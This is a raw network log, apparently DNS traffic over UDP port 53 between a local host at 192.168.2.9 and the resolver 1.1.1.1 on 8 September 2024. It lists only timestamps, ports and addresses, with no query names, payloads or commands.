                                                                                                                                                                                                          Sep 8, 2024 10:53:40.187593937 CEST6440253192.168.2.91.1.1.1
                                                                                                                                                                                                          Sep 8, 2024 10:53:40.190052032 CEST53493921.1.1.1192.168.2.9
                                                                                                                                                                                                          Sep 8, 2024 10:53:40.190498114 CEST53622291.1.1.1192.168.2.9
                                                                                                                                                                                                          Sep 8, 2024 10:53:40.191232920 CEST53651791.1.1.1192.168.2.9
                                                                                                                                                                                                          Sep 8, 2024 10:53:40.191338062 CEST53555421.1.1.1192.168.2.9
                                                                                                                                                                                                          Sep 8, 2024 10:53:40.192073107 CEST53514391.1.1.1192.168.2.9
                                                                                                                                                                                                          Sep 8, 2024 10:53:40.192651033 CEST6087753192.168.2.91.1.1.1
                                                                                                                                                                                                          Sep 8, 2024 10:53:40.193006992 CEST5367853192.168.2.91.1.1.1
                                                                                                                                                                                                          Sep 8, 2024 10:53:40.193317890 CEST5242453192.168.2.91.1.1.1
                                                                                                                                                                                                          Sep 8, 2024 10:53:40.194098949 CEST53586201.1.1.1192.168.2.9
                                                                                                                                                                                                          Sep 8, 2024 10:53:40.199064016 CEST53644021.1.1.1192.168.2.9
                                                                                                                                                                                                          Sep 8, 2024 10:53:40.201773882 CEST53569711.1.1.1192.168.2.9
                                                                                                                                                                                                          Sep 8, 2024 10:53:40.202821970 CEST53608771.1.1.1192.168.2.9
                                                                                                                                                                                                          Sep 8, 2024 10:53:40.202832937 CEST53609301.1.1.1192.168.2.9
                                                                                                                                                                                                          Sep 8, 2024 10:53:40.208503962 CEST53536781.1.1.1192.168.2.9
                                                                                                                                                                                                          Sep 8, 2024 10:53:40.224246025 CEST53524241.1.1.1192.168.2.9
                                                                                                                                                                                                          Sep 8, 2024 10:53:40.303704023 CEST53652071.1.1.1192.168.2.9
                                                                                                                                                                                                          Sep 8, 2024 10:53:40.303719044 CEST53630541.1.1.1192.168.2.9
                                                                                                                                                                                                          Sep 8, 2024 10:53:40.306252003 CEST53511581.1.1.1192.168.2.9
                                                                                                                                                                                                          Sep 8, 2024 10:53:40.316538095 CEST53524121.1.1.1192.168.2.9
                                                                                                                                                                                                          Sep 8, 2024 10:53:40.348547935 CEST53557961.1.1.1192.168.2.9
                                                                                                                                                                                                          Sep 8, 2024 10:53:41.673913956 CEST5716353192.168.2.91.1.1.1
                                                                                                                                                                                                          Sep 8, 2024 10:53:41.674545050 CEST5150453192.168.2.91.1.1.1
                                                                                                                                                                                                          Sep 8, 2024 10:53:41.675309896 CEST5860853192.168.2.91.1.1.1
                                                                                                                                                                                                          Sep 8, 2024 10:53:41.675426960 CEST5968853192.168.2.91.1.1.1
                                                                                                                                                                                                          Sep 8, 2024 10:53:41.678431034 CEST5119353192.168.2.91.1.1.1
                                                                                                                                                                                                          Sep 8, 2024 10:53:41.683329105 CEST53571631.1.1.1192.168.2.9
                                                                                                                                                                                                          Sep 8, 2024 10:53:41.684463978 CEST53515041.1.1.1192.168.2.9
                                                                                                                                                                                                          Sep 8, 2024 10:53:41.684822083 CEST53586081.1.1.1192.168.2.9
                                                                                                                                                                                                          Sep 8, 2024 10:53:41.685762882 CEST6061853192.168.2.91.1.1.1
                                                                                                                                                                                                          Sep 8, 2024 10:53:41.686399937 CEST5716453192.168.2.91.1.1.1
                                                                                                                                                                                                          Sep 8, 2024 10:53:41.687201977 CEST53511931.1.1.1192.168.2.9
                                                                                                                                                                                                          Sep 8, 2024 10:53:41.689151049 CEST5388253192.168.2.91.1.1.1
                                                                                                                                                                                                          Sep 8, 2024 10:53:41.690027952 CEST5689653192.168.2.91.1.1.1
                                                                                                                                                                                                          Sep 8, 2024 10:53:41.690582037 CEST5121053192.168.2.91.1.1.1
                                                                                                                                                                                                          Sep 8, 2024 10:53:41.690942049 CEST53596881.1.1.1192.168.2.9
                                                                                                                                                                                                          Sep 8, 2024 10:53:41.691524029 CEST5286353192.168.2.91.1.1.1
                                                                                                                                                                                                          Sep 8, 2024 10:53:41.691776991 CEST5288053192.168.2.91.1.1.1
                                                                                                                                                                                                          Sep 8, 2024 10:53:41.695650101 CEST53571641.1.1.1192.168.2.9
                                                                                                                                                                                                          Sep 8, 2024 10:53:41.697381020 CEST5732253192.168.2.91.1.1.1
                                                                                                                                                                                                          Sep 8, 2024 10:53:41.698728085 CEST53538821.1.1.1192.168.2.9
                                                                                                                                                                                                          Sep 8, 2024 10:53:41.700290918 CEST6198653192.168.2.91.1.1.1
                                                                                                                                                                                                          Sep 8, 2024 10:53:41.700567961 CEST6264953192.168.2.91.1.1.1
                                                                                                                                                                                                          Sep 8, 2024 10:53:41.701443911 CEST53528631.1.1.1192.168.2.9
                                                                                                                                                                                                          Sep 8, 2024 10:53:41.701843023 CEST53606181.1.1.1192.168.2.9
                                                                                                                                                                                                          Sep 8, 2024 10:53:41.701852083 CEST6549553192.168.2.91.1.1.1
                                                                                                                                                                                                          Sep 8, 2024 10:53:41.702613115 CEST6406053192.168.2.91.1.1.1
                                                                                                                                                                                                          Sep 8, 2024 10:53:41.705915928 CEST53568961.1.1.1192.168.2.9
                                                                                                                                                                                                          Sep 8, 2024 10:53:41.707176924 CEST6432053192.168.2.91.1.1.1
                                                                                                                                                                                                          Sep 8, 2024 10:53:41.707734108 CEST53528801.1.1.1192.168.2.9
                                                                                                                                                                                                          Sep 8, 2024 10:53:41.708267927 CEST6365753192.168.2.91.1.1.1
                                                                                                                                                                                                          Sep 8, 2024 10:53:41.708698988 CEST5252653192.168.2.91.1.1.1
                                                                                                                                                                                                          Sep 8, 2024 10:53:41.709536076 CEST5210553192.168.2.91.1.1.1
                                                                                                                                                                                                          Sep 8, 2024 10:53:41.710047007 CEST53619861.1.1.1192.168.2.9
                                                                                                                                                                                                          Sep 8, 2024 10:53:41.710597992 CEST53626491.1.1.1192.168.2.9
                                                                                                                                                                                                          Sep 8, 2024 10:53:41.711954117 CEST53654951.1.1.1192.168.2.9
                                                                                                                                                                                                          Sep 8, 2024 10:53:41.718153000 CEST53640601.1.1.1192.168.2.9
                                                                                                                                                                                                          Sep 8, 2024 10:53:41.718566895 CEST53521051.1.1.1192.168.2.9
                                                                                                                                                                                                          Sep 8, 2024 10:53:41.718660116 CEST53636571.1.1.1192.168.2.9
                                                                                                                                                                                                          Sep 8, 2024 10:53:41.718868017 CEST6447753192.168.2.91.1.1.1
                                                                                                                                                                                                          Sep 8, 2024 10:53:41.719423056 CEST5204953192.168.2.91.1.1.1
                                                                                                                                                                                                          Sep 8, 2024 10:53:41.719719887 CEST53525261.1.1.1192.168.2.9
                                                                                                                                                                                                          Sep 8, 2024 10:53:41.720164061 CEST5219153192.168.2.91.1.1.1
                                                                                                                                                                                                          Sep 8, 2024 10:53:41.720196009 CEST6023253192.168.2.91.1.1.1
                                                                                                                                                                                                          Sep 8, 2024 10:53:41.720325947 CEST53512101.1.1.1192.168.2.9
                                                                                                                                                                                                          Sep 8, 2024 10:53:41.721121073 CEST6349953192.168.2.91.1.1.1
                                                                                                                                                                                                          Sep 8, 2024 10:53:41.721496105 CEST5116153192.168.2.91.1.1.1
                                                                                                                                                                                                          Sep 8, 2024 10:53:41.722783089 CEST53643201.1.1.1192.168.2.9
                                                                                                                                                                                                          Sep 8, 2024 10:53:41.728565931 CEST53644771.1.1.1192.168.2.9
                                                                                                                                                                                                          Sep 8, 2024 10:53:41.728669882 CEST53573221.1.1.1192.168.2.9
                                                                                                                                                                                                          Sep 8, 2024 10:53:41.730288029 CEST5947253192.168.2.91.1.1.1
                                                                                                                                                                                                          Sep 8, 2024 10:53:41.731636047 CEST53511611.1.1.1192.168.2.9
                                                                                                                                                                                                          Sep 8, 2024 10:53:41.731956959 CEST53634991.1.1.1192.168.2.9
                                                                                                                                                                                                          Sep 8, 2024 10:53:41.736819983 CEST53520491.1.1.1192.168.2.9
                                                                                                                                                                                                          Sep 8, 2024 10:53:41.737488031 CEST53521911.1.1.1192.168.2.9
                                                                                                                                                                                                          Sep 8, 2024 10:53:41.740367889 CEST53594721.1.1.1192.168.2.9
                                                                                                                                                                                                          Sep 8, 2024 10:53:41.750953913 CEST53602321.1.1.1192.168.2.9
                                                                                                                                                                                                          Sep 8, 2024 10:53:41.758579016 CEST6144753192.168.2.91.1.1.1
                                                                                                                                                                                                          Sep 8, 2024 10:53:41.760075092 CEST6342153192.168.2.91.1.1.1
                                                                                                                                                                                                          Sep 8, 2024 10:53:41.760251999 CEST6163453192.168.2.91.1.1.1
                                                                                                                                                                                                          Sep 8, 2024 10:53:41.760500908 CEST5336053192.168.2.91.1.1.1
                                                                                                                                                                                                          Sep 8, 2024 10:53:41.768565893 CEST53614471.1.1.1192.168.2.9
                                                                                                                                                                                                          Sep 8, 2024 10:53:41.770092964 CEST53533601.1.1.1192.168.2.9
                                                                                                                                                                                                          Sep 8, 2024 10:53:43.158845901 CEST5636353192.168.2.91.1.1.1
                                                                                                                                                                                                          Sep 8, 2024 10:53:43.159035921 CEST5655553192.168.2.91.1.1.1
                                                                                                                                                                                                          Sep 8, 2024 10:53:43.159260035 CEST5880853192.168.2.91.1.1.1
                                                                                                                                                                                                          Sep 8, 2024 10:53:43.159410954 CEST6234153192.168.2.91.1.1.1
                                                                                                                                                                                                          Sep 8, 2024 10:53:43.159555912 CEST5037953192.168.2.91.1.1.1
                                                                                                                                                                                                          Sep 8, 2024 10:53:43.160043955 CEST6478753192.168.2.91.1.1.1
                                                                                                                                                                                                          Sep 8, 2024 10:53:43.160351038 CEST6066053192.168.2.91.1.1.1
                                                                                                                                                                                                          Sep 8, 2024 10:53:43.165760040 CEST53530381.1.1.1192.168.2.9
                                                                                                                                                                                                          Sep 8, 2024 10:53:43.165909052 CEST53547011.1.1.1192.168.2.9
                                                                                                                                                                                                          Sep 8, 2024 10:53:43.167397022 CEST53584511.1.1.1192.168.2.9
                                                                                                                                                                                                          Sep 8, 2024 10:53:43.167416096 CEST53546891.1.1.1192.168.2.9
                                                                                                                                                                                                          Sep 8, 2024 10:53:43.167431116 CEST53512741.1.1.1192.168.2.9
                                                                                                                                                                                                          Sep 8, 2024 10:53:43.169642925 CEST53565551.1.1.1192.168.2.9
                                                                                                                                                                                                          Sep 8, 2024 10:53:43.169766903 CEST53587711.1.1.1192.168.2.9
                                                                                                                                                                                                          Sep 8, 2024 10:53:43.169948101 CEST53623411.1.1.1192.168.2.9
                                                                                                                                                                                                          Sep 8, 2024 10:53:43.170593023 CEST53606601.1.1.1192.168.2.9
                                                                                                                                                                                                          Sep 8, 2024 10:53:43.174220085 CEST53563631.1.1.1192.168.2.9
                                                                                                                                                                                                          Sep 8, 2024 10:53:43.174514055 CEST53588081.1.1.1192.168.2.9
                                                                                                                                                                                                          Sep 8, 2024 10:53:43.175636053 CEST53503791.1.1.1192.168.2.9
                                                                                                                                                                                                          Sep 8, 2024 10:53:43.177867889 CEST6095653192.168.2.91.1.1.1
                                                                                                                                                                                                          Sep 8, 2024 10:53:43.178421974 CEST5341653192.168.2.91.1.1.1
                                                                                                                                                                                                          Sep 8, 2024 10:53:43.178488016 CEST5067753192.168.2.91.1.1.1
                                                                                                                                                                                                          Sep 8, 2024 10:53:43.178704977 CEST5771353192.168.2.91.1.1.1
                                                                                                                                                                                                          Sep 8, 2024 10:53:43.178833008 CEST6263253192.168.2.91.1.1.1
                                                                                                                                                                                                          Sep 8, 2024 10:53:43.179001093 CEST5308253192.168.2.91.1.1.1
                                                                                                                                                                                                          Sep 8, 2024 10:53:43.179073095 CEST6317853192.168.2.91.1.1.1
                                                                                                                                                                                                          Sep 8, 2024 10:53:43.179263115 CEST5999053192.168.2.91.1.1.1
                                                                                                                                                                                                          Sep 8, 2024 10:53:43.179282904 CEST5881753192.168.2.91.1.1.1
                                                                                                                                                                                                          Sep 8, 2024 10:53:43.179459095 CEST4929053192.168.2.91.1.1.1
                                                                                                                                                                                                          Sep 8, 2024 10:53:43.179594994 CEST5165853192.168.2.91.1.1.1
                                                                                                                                                                                                          Sep 8, 2024 10:53:43.179836988 CEST5841953192.168.2.91.1.1.1
                                                                                                                                                                                                          Sep 8, 2024 10:53:43.184842110 CEST5943553192.168.2.91.1.1.1
                                                                                                                                                                                                          Sep 8, 2024 10:53:43.188291073 CEST53588171.1.1.1192.168.2.9
                                                                                                                                                                                                          Sep 8, 2024 10:53:43.188329935 CEST53626321.1.1.1192.168.2.9
                                                                                                                                                                                                          Sep 8, 2024 10:53:43.188880920 CEST53516581.1.1.1192.168.2.9
                                                                                                                                                                                                          Sep 8, 2024 10:53:43.189023972 CEST53530821.1.1.1192.168.2.9
                                                                                                                                                                                                          Sep 8, 2024 10:53:43.189053059 CEST53584191.1.1.1192.168.2.9
                                                                                                                                                                                                          Sep 8, 2024 10:53:43.189807892 CEST53601751.1.1.1192.168.2.9
                                                                                                                                                                                                          Sep 8, 2024 10:53:43.189840078 CEST53631781.1.1.1192.168.2.9
                                                                                                                                                                                                          Sep 8, 2024 10:53:43.190747976 CEST53647871.1.1.1192.168.2.9
                                                                                                                                                                                                          Sep 8, 2024 10:53:43.194228888 CEST5373453192.168.2.91.1.1.1
                                                                                                                                                                                                          Sep 8, 2024 10:53:43.194720030 CEST53577131.1.1.1192.168.2.9
                                                                                                                                                                                                          Sep 8, 2024 10:53:43.194732904 CEST53609561.1.1.1192.168.2.9
                                                                                                                                                                                                          Sep 8, 2024 10:53:43.195288897 CEST53506771.1.1.1192.168.2.9
                                                                                                                                                                                                          Sep 8, 2024 10:53:43.195686102 CEST53492901.1.1.1192.168.2.9
                                                                                                                                                                                                          Sep 8, 2024 10:53:43.196108103 CEST5914153192.168.2.91.1.1.1
                                                                                                                                                                                                          Sep 8, 2024 10:53:43.196374893 CEST53594351.1.1.1192.168.2.9
                                                                                                                                                                                                          Sep 8, 2024 10:53:43.197174072 CEST5892653192.168.2.91.1.1.1
                                                                                                                                                                                                          Sep 8, 2024 10:53:43.197398901 CEST5397753192.168.2.91.1.1.1
                                                                                                                                                                                                          Sep 8, 2024 10:53:43.206324100 CEST53591411.1.1.1192.168.2.9
                                                                                                                                                                                                          Sep 8, 2024 10:53:43.207185984 CEST53589261.1.1.1192.168.2.9
                                                                                                                                                                                                          Sep 8, 2024 10:53:43.207854986 CEST53539771.1.1.1192.168.2.9
                                                                                                                                                                                                          Sep 8, 2024 10:53:43.207936049 CEST53534161.1.1.1192.168.2.9
                                                                                                                                                                                                          Sep 8, 2024 10:53:43.248579979 CEST53533221.1.1.1192.168.2.9
                                                                                                                                                                                                          Sep 8, 2024 10:53:43.341790915 CEST53599901.1.1.1192.168.2.9
                                                                                                                                                                                                          Sep 8, 2024 10:53:43.355324984 CEST53537341.1.1.1192.168.2.9
                                                                                                                                                                                                          Sep 8, 2024 10:53:44.706199884 CEST6428053192.168.2.91.1.1.1
                                                                                                                                                                                                          Sep 8, 2024 10:53:44.707220078 CEST6440853192.168.2.91.1.1.1
                                                                                                                                                                                                          Sep 8, 2024 10:53:44.707387924 CEST5734053192.168.2.91.1.1.1
                                                                                                                                                                                                          Sep 8, 2024 10:53:44.708118916 CEST5904753192.168.2.91.1.1.1
                                                                                                                                                                                                          Sep 8, 2024 10:53:44.716485977 CEST53642801.1.1.1192.168.2.9
                                                                                                                                                                                                          Sep 8, 2024 10:53:44.717547894 CEST5867053192.168.2.91.1.1.1
                                                                                                                                                                                                          Sep 8, 2024 10:53:44.717703104 CEST53644081.1.1.1192.168.2.9
                                                                                                                                                                                                          Sep 8, 2024 10:53:44.718106985 CEST53590471.1.1.1192.168.2.9
                                                                                                                                                                                                          Sep 8, 2024 10:53:44.718286037 CEST6208253192.168.2.91.1.1.1
                                                                                                                                                                                                          Sep 8, 2024 10:53:44.725157022 CEST6294753192.168.2.91.1.1.1
                                                                                                                                                                                                          Sep 8, 2024 10:53:44.725986004 CEST53573401.1.1.1192.168.2.9
                                                                                                                                                                                                          Sep 8, 2024 10:53:44.726422071 CEST5955553192.168.2.91.1.1.1
                                                                                                                                                                                                          Sep 8, 2024 10:53:44.726947069 CEST53586701.1.1.1192.168.2.9
                                                                                                                                                                                                          Sep 8, 2024 10:53:44.727197886 CEST5430253192.168.2.91.1.1.1
                                                                                                                                                                                                          Sep 8, 2024 10:53:44.727351904 CEST53620821.1.1.1192.168.2.9
                                                                                                                                                                                                          Sep 8, 2024 10:53:44.727377892 CEST5022353192.168.2.91.1.1.1
                                                                                                                                                                                                          Sep 8, 2024 10:53:44.728106022 CEST5996853192.168.2.91.1.1.1
                                                                                                                                                                                                          Sep 8, 2024 10:53:44.728950024 CEST6074553192.168.2.91.1.1.1
                                                                                                                                                                                                          Sep 8, 2024 10:53:44.729809999 CEST6266453192.168.2.91.1.1.1
                                                                                                                                                                                                          Sep 8, 2024 10:53:44.729978085 CEST5233253192.168.2.91.1.1.1
                                                                                                                                                                                                          Sep 8, 2024 10:53:44.730957985 CEST5904153192.168.2.91.1.1.1
                                                                                                                                                                                                          Sep 8, 2024 10:53:44.734493971 CEST53629471.1.1.1192.168.2.9
                                                                                                                                                                                                          Sep 8, 2024 10:53:44.736589909 CEST53543021.1.1.1192.168.2.9
                                                                                                                                                                                                          Sep 8, 2024 10:53:44.738656044 CEST6363453192.168.2.91.1.1.1
                                                                                                                                                                                                          Sep 8, 2024 10:53:44.739731073 CEST53626641.1.1.1192.168.2.9
                                                                                                                                                                                                          Sep 8, 2024 10:53:44.740740061 CEST53590411.1.1.1192.168.2.9
                                                                                                                                                                                                          Sep 8, 2024 10:53:44.744224072 CEST53607451.1.1.1192.168.2.9
                                                                                                                                                                                                          Sep 8, 2024 10:53:44.744235039 CEST53599681.1.1.1192.168.2.9
                                                                                                                                                                                                          Sep 8, 2024 10:53:44.745635033 CEST6479753192.168.2.91.1.1.1
                                                                                                                                                                                                          Sep 8, 2024 10:53:44.748229027 CEST5642553192.168.2.91.1.1.1
                                                                                                                                                                                                          Sep 8, 2024 10:53:44.748595953 CEST4921153192.168.2.91.1.1.1
                                                                                                                                                                                                          Sep 8, 2024 10:53:44.753633976 CEST53636341.1.1.1192.168.2.9
                                                                                                                                                                                                          Sep 8, 2024 10:53:44.754071951 CEST5147253192.168.2.91.1.1.1
                                                                                                                                                                                                          Sep 8, 2024 10:53:44.756134033 CEST53647971.1.1.1192.168.2.9
                                                                                                                                                                                                          Sep 8, 2024 10:53:44.758439064 CEST53564251.1.1.1192.168.2.9
                                                                                                                                                                                                          Sep 8, 2024 10:53:44.758558989 CEST53502231.1.1.1192.168.2.9
                                                                                                                                                                                                          Sep 8, 2024 10:53:44.760114908 CEST53523321.1.1.1192.168.2.9
                                                                                                                                                                                                          Sep 8, 2024 10:53:44.762171984 CEST5538953192.168.2.91.1.1.1
                                                                                                                                                                                                          Sep 8, 2024 10:53:44.763168097 CEST5323553192.168.2.91.1.1.1
                                                                                                                                                                                                          Sep 8, 2024 10:53:44.763746977 CEST53514721.1.1.1192.168.2.9
                                                                                                                                                                                                          Sep 8, 2024 10:53:44.763756990 CEST53492111.1.1.1192.168.2.9
                                                                                                                                                                                                          Sep 8, 2024 10:53:44.763835907 CEST6441553192.168.2.91.1.1.1
                                                                                                                                                                                                          Sep 8, 2024 10:53:44.768435001 CEST5220553192.168.2.91.1.1.1
                                                                                                                                                                                                          Sep 8, 2024 10:53:44.768810034 CEST6248453192.168.2.91.1.1.1
                                                                                                                                                                                                          Sep 8, 2024 10:53:44.769068956 CEST5689253192.168.2.91.1.1.1
                                                                                                                                                                                                          Sep 8, 2024 10:53:44.769462109 CEST4946653192.168.2.91.1.1.1
                                                                                                                                                                                                          Sep 8, 2024 10:53:44.770251989 CEST5610853192.168.2.91.1.1.1
                                                                                                                                                                                                          Sep 8, 2024 10:53:44.770901918 CEST5267053192.168.2.91.1.1.1
                                                                                                                                                                                                          Sep 8, 2024 10:53:44.771194935 CEST4975253192.168.2.91.1.1.1
                                                                                                                                                                                                          Sep 8, 2024 10:53:44.772711039 CEST53553891.1.1.1192.168.2.9
                                                                                                                                                                                                          Sep 8, 2024 10:53:46.641006947 CEST53548361.1.1.1192.168.2.9
                                                                                                                                                                                                          Sep 8, 2024 10:53:46.642806053 CEST53598751.1.1.1192.168.2.9
                                                                                                                                                                                                          Sep 8, 2024 10:53:46.644392967 CEST53532301.1.1.1192.168.2.9
                                                                                                                                                                                                          Sep 8, 2024 10:53:46.646266937 CEST6050853192.168.2.91.1.1.1
                                                                                                                                                                                                          Sep 8, 2024 10:53:46.646362066 CEST6340053192.168.2.91.1.1.1
                                                                                                                                                                                                          Sep 8, 2024 10:53:46.646573067 CEST6526353192.168.2.91.1.1.1
                                                                                                                                                                                                          Sep 8, 2024 10:53:46.646754980 CEST6302953192.168.2.91.1.1.1
                                                                                                                                                                                                          Sep 8, 2024 10:53:46.647391081 CEST53491541.1.1.1192.168.2.9
                                                                                                                                                                                                          Sep 8, 2024 10:53:46.649508953 CEST5701053192.168.2.91.1.1.1
                                                                                                                                                                                                          Sep 8, 2024 10:53:46.649689913 CEST53549871.1.1.1192.168.2.9
                                                                                                                                                                                                          Sep 8, 2024 10:53:46.649832964 CEST53559671.1.1.1192.168.2.9
                                                                                                                                                                                                          Sep 8, 2024 10:53:46.655978918 CEST53652631.1.1.1192.168.2.9
                                                                                                                                                                                                          Sep 8, 2024 10:53:46.656302929 CEST53586061.1.1.1192.168.2.9
                                                                                                                                                                                                          Sep 8, 2024 10:53:46.657093048 CEST53630291.1.1.1192.168.2.9
                                                                                                                                                                                                          Sep 8, 2024 10:53:46.659334898 CEST53570101.1.1.1192.168.2.9
                                                                                                                                                                                                          Sep 8, 2024 10:53:46.660341024 CEST5795053192.168.2.91.1.1.1
                                                                                                                                                                                                          Sep 8, 2024 10:53:46.662667990 CEST53605081.1.1.1192.168.2.9
                                                                                                                                                                                                          Sep 8, 2024 10:53:46.666996956 CEST6388453192.168.2.91.1.1.1
                                                                                                                                                                                                          Sep 8, 2024 10:53:46.669034004 CEST6280753192.168.2.91.1.1.1
                                                                                                                                                                                                          Sep 8, 2024 10:53:46.669826031 CEST53579501.1.1.1192.168.2.9
                                                                                                                                                                                                          Sep 8, 2024 10:53:46.672666073 CEST5055853192.168.2.91.1.1.1
                                                                                                                                                                                                          Sep 8, 2024 10:53:46.674298048 CEST5846053192.168.2.91.1.1.1
                                                                                                                                                                                                          Sep 8, 2024 10:53:46.674468994 CEST5727553192.168.2.91.1.1.1
                                                                                                                                                                                                          Sep 8, 2024 10:53:46.677058935 CEST53638841.1.1.1192.168.2.9
                                                                                                                                                                                                          Sep 8, 2024 10:53:46.677371025 CEST53634001.1.1.1192.168.2.9
                                                                                                                                                                                                          Sep 8, 2024 10:53:46.679214001 CEST53628071.1.1.1192.168.2.9
                                                                                                                                                                                                          Sep 8, 2024 10:53:46.683109999 CEST53505581.1.1.1192.168.2.9
                                                                                                                                                                                                          Sep 8, 2024 10:53:46.690463066 CEST53584601.1.1.1192.168.2.9
                                                                                                                                                                                                          Sep 8, 2024 10:53:46.690542936 CEST53572751.1.1.1192.168.2.9
                                                                                                                                                                                                          Sep 8, 2024 10:53:46.772264957 CEST53624351.1.1.1192.168.2.9
                                                                                                                                                                                                          Sep 8, 2024 10:53:46.814471006 CEST5826853192.168.2.91.1.1.1
                                                                                                                                                                                                          Sep 8, 2024 10:53:46.814513922 CEST5742453192.168.2.91.1.1.1
                                                                                                                                                                                                          Sep 8, 2024 10:53:46.814786911 CEST5376253192.168.2.91.1.1.1
                                                                                                                                                                                                          Sep 8, 2024 10:53:46.815206051 CEST6204453192.168.2.91.1.1.1
                                                                                                                                                                                                          Sep 8, 2024 10:53:46.815423965 CEST5301353192.168.2.91.1.1.1
                                                                                                                                                                                                          Sep 8, 2024 10:53:46.817889929 CEST6161753192.168.2.91.1.1.1
                                                                                                                                                                                                          Sep 8, 2024 10:53:46.818267107 CEST6124553192.168.2.91.1.1.1
                                                                                                                                                                                                          Sep 8, 2024 10:53:46.818289042 CEST5233053192.168.2.91.1.1.1
                                                                                                                                                                                                          Sep 8, 2024 10:53:46.818480015 CEST5812053192.168.2.91.1.1.1
                                                                                                                                                                                                          Sep 8, 2024 10:53:46.818978071 CEST5880253192.168.2.91.1.1.1
                                                                                                                                                                                                          Sep 8, 2024 10:53:46.820452929 CEST5074553192.168.2.91.1.1.1
                                                                                                                                                                                                          Sep 8, 2024 10:53:46.820611954 CEST5703653192.168.2.91.1.1.1
                                                                                                                                                                                                          Sep 8, 2024 10:53:46.820799112 CEST5347753192.168.2.91.1.1.1
                                                                                                                                                                                                          Sep 8, 2024 10:53:46.821549892 CEST4962153192.168.2.91.1.1.1
                                                                                                                                                                                                          Sep 8, 2024 10:53:46.821567059 CEST5021753192.168.2.91.1.1.1
                                                                                                                                                                                                          Sep 8, 2024 10:53:46.821765900 CEST5289353192.168.2.91.1.1.1
                                                                                                                                                                                                          Sep 8, 2024 10:53:46.821933031 CEST6309253192.168.2.91.1.1.1
                                                                                                                                                                                                          Sep 8, 2024 10:53:46.822169065 CEST5855853192.168.2.91.1.1.1
                                                                                                                                                                                                          Sep 8, 2024 10:53:46.822735071 CEST5971253192.168.2.91.1.1.1
                                                                                                                                                                                                          Sep 8, 2024 10:53:46.824440002 CEST53530131.1.1.1192.168.2.9
                                                                                                                                                                                                          Sep 8, 2024 10:53:46.824537039 CEST53537621.1.1.1192.168.2.9
                                                                                                                                                                                                          Sep 8, 2024 10:53:46.824656010 CEST53582681.1.1.1192.168.2.9
                                                                                                                                                                                                          Sep 8, 2024 10:53:46.827529907 CEST53616171.1.1.1192.168.2.9
                                                                                                                                                                                                          Sep 8, 2024 10:53:46.827951908 CEST53523301.1.1.1192.168.2.9
                                                                                                                                                                                                          Sep 8, 2024 10:53:46.828286886 CEST53612451.1.1.1192.168.2.9
                                                                                                                                                                                                          Sep 8, 2024 10:53:46.829201937 CEST53581201.1.1.1192.168.2.9
                                                                                                                                                                                                          Sep 8, 2024 10:53:46.830209017 CEST53570361.1.1.1192.168.2.9
                                                                                                                                                                                                          Sep 8, 2024 10:53:46.830246925 CEST53574241.1.1.1192.168.2.9
                                                                                                                                                                                                          Sep 8, 2024 10:53:46.830295086 CEST53507451.1.1.1192.168.2.9
                                                                                                                                                                                                          Sep 8, 2024 10:53:46.830827951 CEST53630921.1.1.1192.168.2.9
                                                                                                                                                                                                          Sep 8, 2024 10:53:46.831034899 CEST53620441.1.1.1192.168.2.9
                                                                                                                                                                                                          Sep 8, 2024 10:53:46.831381083 CEST53502171.1.1.1192.168.2.9
                                                                                                                                                                                                          Sep 8, 2024 10:53:46.831578016 CEST53585581.1.1.1192.168.2.9
                                                                                                                                                                                                          Sep 8, 2024 10:53:46.831587076 CEST53496211.1.1.1192.168.2.9
                                                                                                                                                                                                          Sep 8, 2024 10:53:46.835210085 CEST53588021.1.1.1192.168.2.9
                                                                                                                                                                                                          Sep 8, 2024 10:53:46.837073088 CEST53534771.1.1.1192.168.2.9
                                                                                                                                                                                                          Sep 8, 2024 10:53:46.837932110 CEST53528931.1.1.1192.168.2.9
                                                                                                                                                                                                          Sep 8, 2024 10:53:46.853419065 CEST53597121.1.1.1192.168.2.9
                                                                                                                                                                                                          Sep 8, 2024 10:53:47.213248968 CEST5580553192.168.2.91.1.1.1
                                                                                                                                                                                                          Sep 8, 2024 10:53:47.216339111 CEST6001353192.168.2.91.1.1.1
                                                                                                                                                                                                          Sep 8, 2024 10:53:47.217235088 CEST5356453192.168.2.91.1.1.1
                                                                                                                                                                                                          Sep 8, 2024 10:53:47.217927933 CEST6366153192.168.2.91.1.1.1
                                                                                                                                                                                                          Sep 8, 2024 10:53:47.223345041 CEST6020653192.168.2.91.1.1.1
                                                                                                                                                                                                          Sep 8, 2024 10:53:47.224988937 CEST5906653192.168.2.91.1.1.1
                                                                                                                                                                                                          Sep 8, 2024 10:53:47.225389004 CEST5147253192.168.2.91.1.1.1
                                                                                                                                                                                                          Sep 8, 2024 10:53:47.226223946 CEST5889653192.168.2.91.1.1.1
                                                                                                                                                                                                          Sep 8, 2024 10:53:47.226686001 CEST5555553192.168.2.91.1.1.1
                                                                                                                                                                                                          Sep 8, 2024 10:53:47.226757050 CEST53600131.1.1.1192.168.2.9
                                                                                                                                                                                                          Sep 8, 2024 10:53:47.226936102 CEST53535641.1.1.1192.168.2.9
                                                                                                                                                                                                          Sep 8, 2024 10:53:47.226969004 CEST5652553192.168.2.91.1.1.1
                                                                                                                                                                                                          Sep 8, 2024 10:53:47.228765965 CEST5597453192.168.2.91.1.1.1
                                                                                                                                                                                                          Sep 8, 2024 10:53:47.229898930 CEST5395753192.168.2.91.1.1.1
                                                                                                                                                                                                          Sep 8, 2024 10:53:47.230392933 CEST4950053192.168.2.91.1.1.1
                                                                                                                                                                                                          Sep 8, 2024 10:53:47.230443001 CEST53558051.1.1.1192.168.2.9
                                                                                                                                                                                                          Sep 8, 2024 10:53:47.234704971 CEST6527153192.168.2.91.1.1.1
                                                                                                                                                                                                          Sep 8, 2024 10:53:47.237737894 CEST53555551.1.1.1192.168.2.9
                                                                                                                                                                                                          Sep 8, 2024 10:53:47.238039017 CEST53588961.1.1.1192.168.2.9
                                                                                                                                                                                                          Sep 8, 2024 10:53:47.239662886 CEST53602061.1.1.1192.168.2.9
                                                                                                                                                                                                          Sep 8, 2024 10:53:47.240123987 CEST53559741.1.1.1192.168.2.9
                                                                                                                                                                                                          Sep 8, 2024 10:53:47.240641117 CEST5306053192.168.2.91.1.1.1
                                                                                                                                                                                                          Sep 8, 2024 10:53:47.241128922 CEST5137253192.168.2.91.1.1.1
                                                                                                                                                                                                          Sep 8, 2024 10:53:47.241543055 CEST4946353192.168.2.91.1.1.1
                                                                                                                                                                                                          Sep 8, 2024 10:53:47.241695881 CEST53590661.1.1.1192.168.2.9
                                                                                                                                                                                                          Sep 8, 2024 10:53:47.242007971 CEST53514721.1.1.1192.168.2.9
